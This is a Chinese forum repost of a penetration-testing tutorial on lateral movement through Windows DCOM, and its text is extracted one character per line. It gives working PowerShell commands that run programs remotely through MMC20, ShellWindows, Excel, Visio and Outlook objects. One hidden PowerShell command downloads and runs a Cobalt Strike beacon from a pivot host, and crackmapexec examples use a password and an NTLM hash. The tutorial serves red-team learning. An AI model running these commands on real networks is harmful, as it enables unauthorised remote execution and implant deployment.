论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[406] 2021-08-22_使用DCOM进行横向渗透
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-16
渗透测试
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-08-22_使用DCOM进行横向渗透
使
用
D
C
O
M
进
行
横
向
渗
透
原
创
a
F
a
攻
防
实
验
室
a
F
a
攻
防
实
验
室
2
0
2
1
-
0
8
-
2
2
收
录
于
话
题
#
内
网
攻
防
,
4
3
个
目
录
目
录
*
引
子
*
D
C
O
M
理
解
*
D
C
O
M
列
表
获
取
*
D
C
O
M
组
件
方
法
获
取
*
D
C
O
M
本
地
执
行
命
令
测
试
*
D
C
O
M
远
程
执
行
命
令
测
试
*
D
C
O
M
在
C
S
中
的
应
用
*
I
m
p
a
c
k
e
t
-
d
c
o
m
e
x
e
c
应
用
*
C
r
a
c
k
m
a
p
e
x
e
c
应
用
*
其
它
可
执
行
命
令
的
组
件
*
总
结
引
子
引
子
之
前
发
表
过
一
篇
D
C
O
M
应
用
的
文
章
,
总
体
看
记
录
的
也
没
什
么
大
错
误
,
但
是
回
头
再
看
,
会
发
现
遗
漏
了
很
多
知
识
点
,
这
里
在
原
来
的
基
础
上
从
新
修
补
一
下
。
原
文
章
地
址
:
D
C
O
M
应
用
D
C
O
M
理
解
理
解
D
i
s
t
r
i
b
u
t
e
d
C
o
m
p
o
n
e
n
t
O
b
j
e
c
t
M
o
d
e
l
缩
写
D
C
O
M
,
译
为
分
布
式
组
件
对
象
模
型
,
这
里
可
以
拆
成
两
个
概
念
,
就
是
分
布
式
和
组
件
对
象
模
型
。
组
件
对
象
模
型
即
C
O
M
对
象
模
型
,
类
似
于
D
L
L
的
另
一
种
表
现
形
式
,
写
好
的
组
件
,
其
中
包
含
了
相
关
功
能
的
函
数
以
供
调
用
,
也
可
以
理
解
为
W
i
n
d
o
w
s
提
供
的
工
具
集
或
者
接
口
集
合
。
组
件
之
间
可
以
相
互
调
用
,
就
像
编
程
语
言
里
的
函
数
可
以
调
用
另
一
个
函
数
,
本
地
系
统
组
件
之
间
的
调
用
可
以
叫
C
O
M
,
而
不
同
系
统
之
间
的
调
用
、
网
络
间
系
统
之
间
的
组
件
调
用
,
则
可
以
叫
D
C
O
M
,
分
布
式
就
可
理
解
成
网
络
。
总
结
D
C
O
M
:
计
算
机
通
过
网
络
在
另
一
台
计
算
机
上
运
行
程
序
。
D
C
O
M
列
表
获
取
列
表
获
取
P
o
w
e
r
s
h
e
l
l
中
通
过
G
e
t
-
C
i
m
I
n
s
t
a
n
c
e
W
i
n
3
2
_
D
C
O
M
A
p
p
l
i
c
a
t
i
o
n
命
令
可
以
获
取
D
c
o
m
程
序
列
表
,
这
个
命
令
在
P
o
w
e
r
s
h
e
l
l
3
.
0
以
上
版
本
存
在
,
系
统
在
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
及
以
上
。
P
o
w
e
r
s
h
e
l
l
3
.
0
及
以
下
,
可
以
使
用
G
e
t
-
W
m
i
O
b
j
e
c
t
命
令
来
代
替
:
命
令
向
下
兼
容
,
P
o
w
e
r
s
h
e
l
l
3
.
0
以
上
同
样
也
支
持
G
e
t
-
W
m
i
O
b
j
e
c
t
:
D
C
O
M
组
件
方
法
获
取
组
件
方
法
获
取
组
件
中
包
含
了
很
多
方
法
,
可
以
用
G
e
t
-
M
e
m
b
e
r
查
看
,
该
命
令
用
来
获
取
对
象
的
成
员
和
属
性
,
使
用
方
式
是
把
对
象
以
管
道
的
形
式
给
G
e
t
-
M
e
m
b
e
r
,
例
如
M
M
C
:
#
P
S
3
.
0
以
上
:
构
建
一
个
M
M
C
对
象
$
m
=
[
S
y
s
t
e
m
.
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
S
T
A
N
C
E
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
2
7
.
0
.
0
.
1
"
)
)
#
查
看
M
M
C
对
象
的
属
性
和
方
法
$
m
.
D
o
c
u
m
e
n
t
.
A
c
t
i
v
e
V
i
e
w
|
G
e
t
-
M
e
m
b
e
r
D
C
O
M
本
地
执
行
命
令
测
试
本
地
执
行
命
令
测
试
上
面
M
M
C
组
件
中
有
一
个
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
方
法
,
该
方
法
可
用
来
执
行
命
令
,
参
数
详
细
介
绍
可
以
看
下
官
方
说
明
:
h
t
t
p
s
:
/
/
d
o
c
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
z
h
-
c
n
/
p
r
e
v
i
o
u
s
-
v
e
r
s
i
o
n
s
/
w
i
n
d
o
w
s
/
d
e
s
k
t
o
p
/
m
m
c
/
v
i
e
w
-
e
x
e
c
u
t
e
s
h
e
l
l
c
o
m
m
a
n
d
?
r
e
d
i
r
e
c
t
e
d
f
r
o
m
=
M
S
D
N
命
令
及
示
例
如
下
:
第
一
个
参
数
接
收
的
是
要
运
行
的
命
令
,
也
相
当
于
调
用
一
个
e
x
e
文
件
,
第
二
个
参
数
指
定
工
作
目
录
,
空
则
代
表
当
前
目
录
,
第
三
个
指
定
的
是
命
令
的
参
数
,
第
四
个
指
的
窗
口
的
状
态
,
我
看
文
档
中
给
了
三
个
值
:
M
i
n
i
m
z
e
d
、
M
a
x
i
m
i
z
e
d
、
R
e
s
t
o
r
e
d
。
经
过
测
试
,
如
果
是
M
i
n
i
m
z
e
d
,
则
c
m
d
窗
口
会
在
最
小
化
的
时
候
执
行
命
令
,
M
a
x
i
m
i
z
e
d
是
窗
口
最
大
化
然
后
执
行
命
令
,
R
e
s
t
o
r
e
d
就
是
正
常
的
运
行
c
m
d
默
认
窗
口
然
后
执
行
命
令
。
实
际
效
果
命
令
执
行
后
窗
口
就
关
了
,
眼
看
都
一
样
,
都
是
闪
一
下
,
实
际
中
可
以
使
用
M
i
n
i
m
z
e
d
。
上
面
两
条
语
句
是
P
S
3
.
0
以
上
的
方
法
,
如
果
目
标
机
P
S
版
本
不
符
合
,
则
命
令
不
会
执
行
,
3
.
0
及
以
下
用
法
如
下
:
P
S
3
.
0
以
下
通
过
指
定
I
D
来
进
行
调
用
,
命
令
中
9
B
那
一
长
串
代
表
的
是
S
h
e
l
l
W
i
n
d
o
w
s
组
件
,
通
过
下
面
的
组
件
列
表
查
询
的
内
容
可
以
看
到
:
$
m
=
[
S
y
s
t
e
m
.
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
S
T
A
N
C
E
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
2
7
.
0
.
0
.
1
"
)
)
$
m
.
D
o
c
u
m
e
n
t
.
A
c
t
i
v
e
V
i
e
w
.
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
(
"
c
m
d
"
,
$
n
u
l
l
,
"
/
c
c
a
l
c
"
,
"
M
i
n
i
m
z
e
d
"
)
$
a
=
[
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
T
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
'
9
B
A
0
5
9
7
2
-
F
6
A
8
-
1
1
C
F
-
A
4
4
2
-
0
0
A
0
C
9
0
A
8
F
3
9
'
,
"
1
2
7
.
0
.
0
.
1
"
)
)
$
a
.
i
t
e
m
(
)
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
S
h
e
l
l
E
x
e
c
u
t
e
(
"
c
m
d
.
e
x
e
"
,
"
/
c
c
a
l
c
.
e
x
e
"
,
"
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
"
,
$
n
u
l
l
,
0
)
这
种
查
看
组
件
方
法
也
类
似
:
其
中
有
一
个
S
h
e
l
l
E
x
e
c
u
t
e
方
法
,
该
方
法
参
数
详
细
说
明
可
参
考
官
方
文
档
:
h
t
t
p
s
:
/
/
d
o
c
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
e
n
-
u
s
/
w
i
n
d
o
w
s
/
w
i
n
3
2
/
s
h
e
l
l
/
s
h
e
l
l
-
s
h
e
l
l
e
x
e
c
u
t
e
执
行
效
果
如
下
:
D
C
O
M
远
程
执
行
命
令
测
试
远
程
执
行
命
令
测
试
通
常
情
况
下
需
要
使
用
D
C
O
M
调
用
其
它
机
器
组
件
来
执
行
一
些
任
务
,
而
使
用
方
法
和
上
面
本
地
示
例
是
一
样
的
,
只
需
要
把
I
P
换
成
目
标
I
P
即
可
。
注
意
点
1
:
自
己
当
前
机
器
需
要
是
管
理
员
身
份
,
否
则
不
能
调
用
目
标
机
的
组
件
。
注
意
点
2
:
目
标
机
防
火
墙
要
关
闭
,
或
者
是
入
站
规
则
允
许
C
o
m
组
件
动
态
的
端
口
入
站
。
如
果
防
火
墙
开
启
的
话
,
会
报
类
似
下
面
这
个
错
误
:
D
C
O
M
在
在
C
S
中
的
应
用
中
的
应
用
思
路
基
本
就
是
利
用
组
件
在
目
标
机
执
行
命
令
来
上
线
,
比
如
C
S
生
成
P
o
w
e
r
s
h
e
l
l
命
令
,
这
里
测
试
环
境
的
目
标
机
不
出
网
,
i
p
是
1
3
8
,
但
可
以
和
机
器
1
4
3
通
信
,
1
4
3
已
经
上
线
,
以
1
4
3
为
跳
板
来
测
试
。
1
4
3
有
个
W
e
b
服
务
,
这
里
就
在
1
4
3
上
设
置
个
监
听
,
生
成
一
个
P
S
脚
本
挂
上
面
,
让
1
3
8
下
载
执
行
,
命
令
如
下
:
这
里
可
以
直
接
进
入
远
程
桌
面
的
p
o
w
e
r
s
h
e
l
l
执
行
上
面
命
令
,
也
可
以
b
e
a
c
o
n
中
交
互
执
行
,
但
p
o
w
e
r
s
h
e
l
l
直
接
跟
命
令
,
可
能
会
因
为
一
些
符
号
出
现
问
题
:
其
实
本
质
还
是
在
执
行
p
o
w
e
r
s
h
e
l
l
命
令
,
这
个
也
有
个
C
S
插
件
,
但
用
着
也
碰
到
了
一
些
问
题
,
感
兴
趣
可
参
考
:
h
t
t
p
s
:
/
/
b
l
o
g
.
c
o
b
a
l
t
s
t
r
i
k
e
.
c
o
m
/
2
0
1
7
/
0
1
/
2
4
/
s
c
r
i
p
t
i
n
g
-
m
a
t
t
-
n
e
l
s
o
n
s
-
m
m
c
2
0
-
a
p
p
l
i
c
a
t
i
o
n
-
l
a
t
e
r
a
l
-
m
o
v
e
m
e
n
t
-
t
e
c
h
n
i
q
u
e
/
I
m
p
a
c
k
e
t
-
d
c
o
m
e
x
e
c
应
用
应
用
I
m
p
a
c
k
e
t
包
中
带
有
d
c
o
m
e
x
e
c
,
用
法
基
本
和
p
s
e
x
e
c
、
w
m
i
e
x
e
c
都
差
不
多
,
在
获
取
账
号
密
码
的
情
况
下
,
使
用
o
b
j
e
c
t
参
数
指
定
组
件
即
可
:
[
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
T
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
'
9
B
A
0
5
9
7
2
-
F
6
A
8
-
1
1
C
F
-
A
4
4
2
-
0
0
A
0
C
9
0
A
8
F
3
9
'
,
'
1
9
2
.
1
6
8
.
5
2
.
1
3
8
'
)
)
.
i
t
e
m
(
)
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
S
h
e
l
l
E
x
e
c
u
t
e
(
'
p
o
w
e
r
s
h
e
l
l
'
,
"
-
n
o
p
-
w
h
i
d
d
e
n
-
c
i
e
x
(
N
e
w
-
O
b
j
e
c
t
N
e
t
.
W
e
b
C
l
i
e
n
t
)
.
D
o
w
n
l
o
a
d
S
t
r
i
n
g
(
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
5
2
.
1
4
3
/
b
e
a
c
o
n
.
p
s
1
'
)
"
,
'
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
'
,
$
n
u
l
l
,
0
)
如
果
没
获
取
到
密
码
,
只
有
h
a
s
h
,
也
可
以
使
用
h
a
s
h
e
s
指
定
h
a
s
h
使
用
:
C
r
a
c
k
m
a
p
e
x
e
c
应
用
应
用
C
r
a
c
k
m
a
p
e
x
e
c
没
有
交
互
式
s
h
e
l
l
选
项
,
设
计
的
就
是
针
对
多
目
标
的
,
但
也
有
其
它
方
法
可
获
取
,
回
头
总
结
c
m
e
使
用
时
再
列
举
下
,
这
里
看
下
c
m
d
的
m
m
c
e
x
e
c
用
法
:
其
它
可
执
行
命
令
的
组
件
其
它
可
执
行
命
令
的
组
件
除
了
常
见
的
m
m
c
、
s
h
e
l
l
W
i
n
d
o
w
s
自
带
组
件
外
,
还
有
一
些
其
它
组
件
也
支
持
命
令
执
行
,
像
e
x
c
e
l
、
v
i
s
i
o
、
o
u
t
l
o
o
k
等
。
下
面
是
从
网
上
搜
集
来
的
,
这
里
没
有
具
体
测
试
,
参
考
如
下
:
1
,
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
2
,
S
h
e
l
l
B
r
o
w
s
e
r
W
i
n
d
o
w
3
,
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
4
,
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
#
明
文
用
法
c
r
a
c
k
m
a
p
e
x
e
c
s
m
b
-
-
e
x
e
c
-
m
e
t
h
o
d
m
m
c
e
x
e
c
-
d
.
-
u
A
d
m
i
n
i
s
t
r
a
t
o
r
-
p
'
p
a
s
s
1
2
3
'
-
x
"
w
h
o
a
m
i
"
1
9
2
.
1
6
8
.
2
0
4
.
1
8
3
#
H
a
s
h
用
法
c
r
a
c
k
m
a
p
e
x
e
c
s
m
b
-
-
e
x
e
c
-
m
e
t
h
o
d
m
m
c
e
x
e
c
-
d
.
-
u
A
d
m
i
n
i
s
t
r
a
t
o
r
-
H
a
a
d
3
b
4
3
5
b
5
1
4
0
4
e
e
a
a
d
3
b
4
3
5
b
5
1
4
0
4
e
e
:
5
f
b
c
3
d
5
f
e
c
8
2
0
6
a
3
0
f
4
b
6
c
4
7
3
d
6
8
a
e
7
6
-
x
"
w
h
o
a
m
i
"
1
9
2
.
1
6
8
.
2
0
4
.
1
8
3
#
创
建
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
实
例
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
p
r
o
g
I
D
(
"
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
$
c
o
m
.
D
i
s
p
l
a
y
A
l
e
r
t
s
=
$
f
a
l
s
e
#
调
用
D
D
E
I
n
i
t
i
a
t
e
方
法
$
c
o
m
.
D
D
E
I
n
i
t
i
a
t
e
(
"
c
m
d
"
,
"
/
c
c
a
l
c
"
)
#
创
建
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
实
例
,
这
里
是
C
L
S
I
D
的
方
式
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
"
C
0
8
A
F
D
9
0
-
F
2
A
1
-
1
1
D
1
-
8
4
5
5
-
0
0
A
0
C
9
1
F
3
8
8
0
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
调
用
s
h
e
l
l
E
x
e
c
u
t
e
方
法
$
c
o
m
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
c
a
l
c
"
)
#
创
建
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
实
例
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
调
用
s
h
e
l
l
E
x
e
c
u
t
e
方
法
$
c
o
m
.
[
0
]
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
c
a
l
c
.
e
x
e
"
)
#
创
建
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
对
象
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
调
用
O
u
t
l
o
o
k
创
建
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
对
象
$
c
o
m
.
c
r
e
a
t
e
O
b
j
e
c
t
(
"
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
"
)
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
总
结
总
结
很
多
工
具
有
不
同
的
适
应
系
统
,
有
的
在
L
i
n
u
x
上
执
行
效
果
就
没
问
题
,
但
在
W
i
n
d
o
w
s
上
多
多
少
少
会
有
一
些
未
知
错
误
,
向
i
m
p
a
c
k
e
t
、
c
r
a
c
k
m
a
p
e
x
e
c
,
而
有
的
可
能
就
W
i
n
d
o
w
s
执
行
效
果
好
,
如
果
用
法
没
错
,
报
错
又
搜
不
到
解
决
办
法
,
可
以
切
换
下
平
台
试
试
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试